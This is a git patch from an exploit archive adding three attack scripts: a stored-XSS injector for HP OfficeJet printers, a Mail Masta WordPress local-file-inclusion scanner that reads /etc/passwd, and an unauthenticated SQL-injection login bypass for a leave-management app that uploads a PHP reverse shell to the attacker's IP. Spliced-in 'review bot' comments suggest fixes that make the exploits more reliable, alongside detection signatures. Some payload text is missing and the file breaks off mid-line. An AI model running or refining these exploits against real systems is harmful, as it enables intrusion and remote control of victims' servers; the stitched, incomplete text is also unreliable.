From 0388680649021cadeb0c0faf59f01cc2f658ec94 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 26 Aug 2021 05:02:00 +0000
Subject: [PATCH] DB: 2021-08-26

3 changes to exploits/shellcodes

WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)
Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)
---
 exploits/hardware/webapps/50227.py | 58 +++++++++++++++++++++
 exploits/php/webapps/50226.py | 77 ++++++++++++++++++++++++++++
 exploits/php/webapps/50228.py | 81 ++++++++++++++++++++++++++++++
 files_exploits.csv | 3 ++
 4 files changed, 219 insertions(+)
 create mode 100755 exploits/hardware/webapps/50227.py
 create mode 100755 exploits/php/webapps/50226.py
 create mode 100755 exploits/php/webapps/50228.py

diff --git a/exploits/hardware/webapps/50227.py b/exploits/hardware/webapps/50227.py
new file mode 100755
index 000000000..c19a50aa5
--- /dev/null
+++ b/exploits/hardware/webapps/50227.py
@@ -0,0 +1,58 @@
+# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)
+# Date: 01/08/2021
+# Exploit Author: Tyler Butler
+# Vendor Homepage: https://www8.hp.com/
+# Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742
+# Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630
+# Version: HP OfficeJet 7110 Wide Format ePrinter
+# Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A
+
+# PoC:
+import requests
+import json
+from requests.exceptions import HTTPError
+
+target = 'http://192.168.223.1' # The IP of the vulnerable taget
+payload = '''''' # The XSS injection payload you want to use
+path='/DevMgmt/ProductConfigDyn.xml' # Path location of the PUT command
+pre = '''
+
+
+
+
+
+
+''' # The start of the request body
+post = '''
+
+
+
+
+''' # The end of the request body
+body = pre + payload + post
+
+
+headers = {
+ 'Host':'192.168.223.1',
+ 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
+ 'Accept':'*/*',
+ 'Accept-Language':'en-US,en;q=0.5',
+ 'Accept-Encoding':'gzip, deflate',
+ 'Content-Type':'text/xml',
+ 'Content-Length':str(len(body.encode('utf-8'))),
+ 'Origin':'https://192.168.223.1',
+ 'Connection':'close',
+ 'Referer':target,
+ }
+
+print('{!} Starting HP Officejet 4630 XSS Injector .... \n Author: Tyler Butler\n @tbutler0x90')
+try:
+ print('{!} Injecting payload :',payload)
+ response = requests.put(target+path, headers = headers, data = body)
+ response.raise_for_status()
+except HTTPError as http_err:
+ print('{X}',f'HTTP error occurred: {http_err}')
+except Exception as err:
+ print('{X}',f'Other error occurred: {err}')
+else:
+ print('{!} Success!')
\ No newline at end of file
diff --git a/exploits/php/webapps/50226.py b/exploits/php/webapps/50226.py
new file mode 100755
index 000000000..a1fc13497
--- /dev/null
+++ b/exploits/php/webapps/50226.py
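Review bot: `response = requests.put(target+path, headers = headers, data = body)` passes no `timeout`, so a device that accepts the TCP connection and never answers leaves the script blocked indefinitely instead of reaching either error branch; `requests.put(target+path, headers=headers, data=body, timeout=10)` bounds the wait. `requests` derives `Content-Length` from `data` itself, and the `'Host'` and `'Origin'` entries hard-code `192.168.223.1` independently of `target`, so editing `target` alone produces a request whose headers no longer agree with its URL — building them from `target`, as `'Referer'` already does, removes the drift. `import json` is never used. As rendered here `payload`, `pre` and `post` hold only empty lines, so `body` is whitespace; the XML markup was presumably stripped in transit and the hunk should not be read as a complete request body. On the wire the observable is an unauthenticated `PUT` to `/DevMgmt/ProductConfigDyn.xml` with `Content-Type: text/xml` and a browser-style User-Agent, which is the signature a defender watching the device class named in the header would key on.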
@@ -0,0 +1,77 @@
+# Exploit Title: WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
+# Date: 2021-08-24
+# Exploit Author: Matheus Alexandre [Xcatolin]
+# Software Link: https://downloads.wordpress.org/plugin/mail-masta.zip
+# Version: 1.0
+
+WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
+
+* Make sure to modify the wordlist path to your preferred wordlist. You can also download the one i used at Github:
+https://github.com/Xcatolin/Personal-Exploits/
+
+#!/usr/bin/python
+
+# Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability
+
+import requests
+from requests.exceptions import ConnectionError
+
+class bcolors:
+ OKGREEN = '\033[92m'
+ WARNING = '\033[93m'
+ FAIL = '\033[91m'
+ ENDC = '\033[0m'
+ BOLD = '\033[1m'
+ ITALIC = '\33[3m'
+
+print(bcolors.BOLD + """\
+ __ __ _ _ __ __ _
+ | \/ |__ _(_) |___| \/ |__ _ __| |_ __ _
+ | |\/| / _` | | |___| |\/| / _` (_-< _/ _` |
+ |_| |_\__,_|_|_| |_| |_\__,_/__/\__\__,_|
+ _ _ ___ _ _ ___ _ _
+ | | ___ __ __ _| | | __(_) |___ |_ _|_ _ __| |_ _ __(_)___ _ _
+ | |__/ _ \/ _/ _` | | | _|| | / -_) | || ' \/ _| | || (_-< / _ \ ' \
+ |____\___/\__\__,_|_| |_| |_|_\___| |___|_||_\__|_|\_,_/__/_\___/_||_|
+
+
+ |_ . \_/ _ _ |_ _ |. _
+ |_)\/. / \(_(_||_(_)||| )
+ /
+ """ + bcolors.ENDC)
+
+endpoint = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl="
+valid = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+
+
+print (bcolors.WARNING + "[+] Insert the target including the WordPress instance:" + bcolors.ENDC)
+print (bcolors.ITALIC + "ex: http://target.com/wordpress\n" + bcolors.ENDC)
+target = raw_input("~# ")
+
+print (bcolors.WARNING + "[*] Checking if the target is alive..." + bcolors.ENDC)
+try:
+ request = requests.get(target)
+except ConnectionError:
+ print (bcolors.FAIL + "[X] Target not available. Please check the URL you've entered." + bcolors.ENDC)
+ exit(1)
+else:
+ print (bcolors.OKGREEN + "[!] Target up and running!\n" + bcolors.ENDC)
+
+print (bcolors.WARNING + "[*] Checking if the Mail-Masta endpoint is vulnerable..." + bcolors.ENDC)
+try:
+ response = requests.get(target + valid)
+except len(response.content) < 1000 :
+ print (bcolors.FAIL + "[X] Endpoint not vulnerable." + bcolors.ENDC)
+ exit(1)
+else:
+ print (bcolors.OKGREEN + "[!] Endpoint vulnerable!\n" + bcolors.ENDC)
+
+print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC)
+wordlist='wordlist.txt' ## Change here
+lines=open(wordlist, "r").readlines()
+
+for i in range(0, len(lines)):
+ word=lines[i].replace("\n","")
+ response = requests.get(target + endpoint + word)
+ if len(response.content) > 500 :
+ print (bcolors.OKGREEN + "[!] " + bcolors.ENDC) + "File",word,"found!"
\ No newline at end of file
diff --git a/exploits/php/webapps/50228.py b/exploits/php/webapps/50228.py
new file mode 100755
index 000000000..7511c45da
--- /dev/null
+++ b/exploits/php/webapps/50228.py
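Review bot: `except len(response.content) < 1000 :` is not a real handler: an `except` clause must name an exception class, so when `requests.get(target + valid)` succeeds the `else:` branch prints `[!] Endpoint vulnerable!` without the response size ever being examined, and when the request raises, the expression is evaluated with `response` unbound and the script dies with a `NameError` instead of the intended message. The size test belongs in the success path, `if len(response.content) < 1000:` followed by the existing `[X] Endpoint not vulnerable.` print and `exit(1)`, with `except ConnectionError:` as the handler exactly as the liveness probe above does; otherwise every reachable host is reported as vulnerable, which is a false positive in any assessment write-up. `lines=open(wordlist, "r").readlines()` never closes the file and the `range(0, len(lines))` loop only re-indexes it; `with open(wordlist) as fh:` and `for word in fh.read().splitlines():` cover both. The script is Python 2 only (`raw_input`, the final `print` statement), and the bare description lines between `# Version: 1.0` and the `#!/usr/bin/python` shebang sit outside any comment, so as committed it does not parse under either interpreter. On the receiving side every probe is a GET to `count_of_send.php` whose `pl=` parameter carries a filesystem path, which is what a web-server log filter for this plugin should key on.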
@@ -0,0 +1,81 @@
+# Exploit Title: Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)
+# Date: 24-08-2021
+# Exploit Author: Justin White
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html
+# Version: V1
+# Category: Webapps
+# Tested on: Linux
+
+
+#!/bin/env python3
+import requests
+import time
+import sys
+from colorama import Fore, Style
+
+if len(sys.argv) != 4:
+ print('python3 script.py ')
+ print('Example: python3 script.py http://127.0.0.1/ 10.0.0.1 4444')
+ exit()
+
+else:
+ try:
+ url = sys.argv[1]
+ attacker_ip = sys.argv[2]
+ attacker_port = sys.argv[3]
+ print()
+ print('[*] Trying to login...')
+ time.sleep(1)
+ login = url + '/classes/Login.php?f=login'
+ payload_name = "reverse_shell.php"
+ payload_file = r"""& /dev/tcp/\"{}\"/{} 0>&1'");?>""".format(attacker_ip, attacker_port)
+ session = requests.session()
+ post_data = {"username": "'' OR 1=1-- -'", "password": "'' OR 1=1-- -'"}
+ user_login = session.post(login, data=post_data)
+ cookie = session.cookies.get_dict()
+
+ if user_login.text == '{"status":"success"}':
+ print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')
+ upload_url = url + "/classes/Users.php?f=save"
+ cookies = cookie
+ headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"}
+ data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
+ print('[*] Trying to Upload Reverse Shell...')
+ time.sleep(2)
+
+ try:
+ print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Reverse Shell Uploaded!')
+ upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
+ upload_check = f'{url}/uploads'
+ r = requests.get(upload_check)
+ if payload_name in r.text:
+
+ payloads = r.text.split('